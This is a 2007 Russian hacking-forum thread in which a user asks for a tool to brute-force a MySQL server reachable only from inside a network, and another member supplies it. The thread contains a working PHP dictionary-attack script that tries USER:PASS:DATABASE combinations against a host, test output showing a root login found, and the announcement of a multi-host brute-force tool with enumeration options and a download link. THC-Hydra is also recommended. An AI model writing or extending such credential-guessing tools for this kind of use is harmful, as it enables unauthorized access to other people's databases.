Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Нужен скрипт для бурта mysql. (https://forum.antichat.xyz/showthread.php?t=49987)

guest3297 27.09.2007 16:49
Нужен скрипт для бурта mysql.
 
Нужен скрипт для бурта mysql, на край нужен софт, пущу через сокс, трабл в том что mysql не видно из нета.

groundhog 27.09.2007 16:53
А локальный доступ есть? Какой доступ вообще? На уровне веб? На уровне консоли?

guest3297 27.09.2007 17:00
На уровне веб на уровне консоли.
Нужен или скрипт php perl, или бинарник под win or *nix or BSD.

groundhog 27.09.2007 17:03
[ cash ], ну ок. Словарь или прямой?

guest3297 27.09.2007 17:09
Как понять прямой?
Лучше бы что то типо
вбиываешь ip:port
и путь к файлику ну допустим USER:PASS:DATABASE

groundhog 27.09.2007 18:56
Код:
<?php

        $target = "127.0.0.1:3306";  // Реквизиты хоста
        $dictionary = "brute.dic";  // Путь к словарю

        if (!file_exists($dictionary)) die("Error: dictionary not found!");

        $file_id = fopen($dictionary, "r") or die("Error: could not open dictionary!");

        while (!feof($file_id)) {
                $line = trim(fgets($file_id, 1024));

                if (strlen($line) > 0) {
                        $dic_data = split(":", $line);

                        if (count($dic_data) != 3) print("Error: wrong data - skipping current line");
                        else {
                                $user                = strval($dic_data[0]);
                                $password = strval($dic_data[1]);
                                $database = strval($dic_data[2]);

                                printf("Trying USER=%s PASSWD=%s DBNAME=%s. Result: ", $user, $password, $database);

                                $db_id = @mysql_connect($target, $user, $password);

                                if (!is_resource($db_id)) print("<font color=\"red\">failed</font><br>\n");
                                else {
                                        print("<font color=\"green\"><b>!!! SUCCESS !!!</b></font><br>\n");
                                        printf("Trying to get database '%s' for user '%s'. Result: ", $database, $user);

                                        if (!@mysql_selectdb($database)) print("<font color=\"red\">failed</font><br>\n");
                                        else print("<font color=\"green\"><b>!!! SUCCESS !!!</b></font><br>\n");
                                }

                                @mysql_close($db_id);
                        }
                }
        }

        fclose($file_id);

?>
Словарь формата: USER:PASS:DATABASE.

Результат теста на локальном мускле:

Цитата:
Tring USER=user1 PASSWD=pass1 DBNAME=database1. Result: failed
Tring USER=user2 PASSWD=pass2 DBNAME=database2. Result: failed
Tring USER=user3 PASSWD=pass3 DBNAME=database3. Result: failed
Tring USER=root PASSWD=!root! DBNAME=test. Result: !!! SUCCESS !!!
Trying to get database 'test' for user 'root'. Result: !!! SUCCESS !!!
Это имел в виду?

N19hTW0lF 29.09.2007 11:32
у мну говорить ощыбка....-(

limpompo 29.09.2007 12:46
N19hTW0lF - ну так напиши чё за ошибка в какой Часте тела!

blackybr 30.09.2007 10:35
кэш, лучше гидры ничего не найдешь

http://freeworld.thc.org/thc-hydra/

guest3297 30.09.2007 10:51
в данном случае скрпит был лучше чем гидра.

groundhog 30.09.2007 12:40
N19hTW0lF, говори что за ошибка... Разберёмся...

N19hTW0lF 30.09.2007 13:08
groundhog
сори ...оказывается у мну проби!=))сори еще раз!

guest3297 30.09.2007 13:29
groundhog
Можешь слегка модфицировать свой скриптик что бы брутил еще допутим по листу ip пасс что была менюшка и какойто интерфейс. И собственно зарелизить на ачате как тулзу для брута, сама идея довольно интересная. Если зарелизишь подкину словарик.

groundhog 30.09.2007 16:15
[ cash ], без проблем... Составь ТЗ, в котором опиши всё, что хочешь от скрипта, вплоть до визуальных пожеланий и т.д. Скидывай в личку и через пару дней забубеню в лучшем виде. :)

N19hTW0lF 02.10.2007 20:03
тока сюда поставь акей?-))

groundhog 03.10.2007 02:43
Simple MySQL Brute Tool v.0.0.1
 
Simple MySQL Brute Tool v.0.0.1 [cash] edition

smbrute.php [[-host=%HOST%] [-port=%PORT%] | [-hosts=%FILE%]]
[-tables] [-databases] [-version] [-help] -accounts=%FILE%

Утилита поддерживает следующий список параметров командной стоки:
  • -help – вывод краткой справки по команде;
  • -host – задаёт единичный целевой хост, к которому будет вестись подключение, данный параметр является необязательным и по умолчанию имеет значение 127.0.0.1;
  • -port – задаёт порт на единичном целевом хосте, к которому будет вестись подключение, параметр является необязательным и по умолчанию имеет значение 3306;
  • -tables – данный необязательный параметр позволяет отобразить список имеющихся таблиц в базе данных, в случае успешной авторизации (при условии, что у заданного пользователя будет полноценный доступ к этой информации);
  • -hosts – задаёт файл-словарь с сетевыми записями, установка данного параметра приводит к игнорированию параметров -host и -port, так как все данные для подключений будут браться из словаря;
  • -databases – данный необязательный параметр позволяет отобразить список всех имеющихся баз данных в случае успешной авторизации (при условии, что у заданного пользователя будет полноценный доступ к этой информации);
  • -version – данный необязательный параметр позволяет определить версию сервера баз данных в случае успешной авторизации;
  • -accounts – единственный обязательный параметр, задаёт файл-словарь с учётными записями, по которым и будет производится перебор;
Сам скрипт и краткий мануал в формате pdf можно взять тут: http://slil.ru/24928577

cb93ka 29.11.2007 20:01
перезалейте плз.


Время: 14:54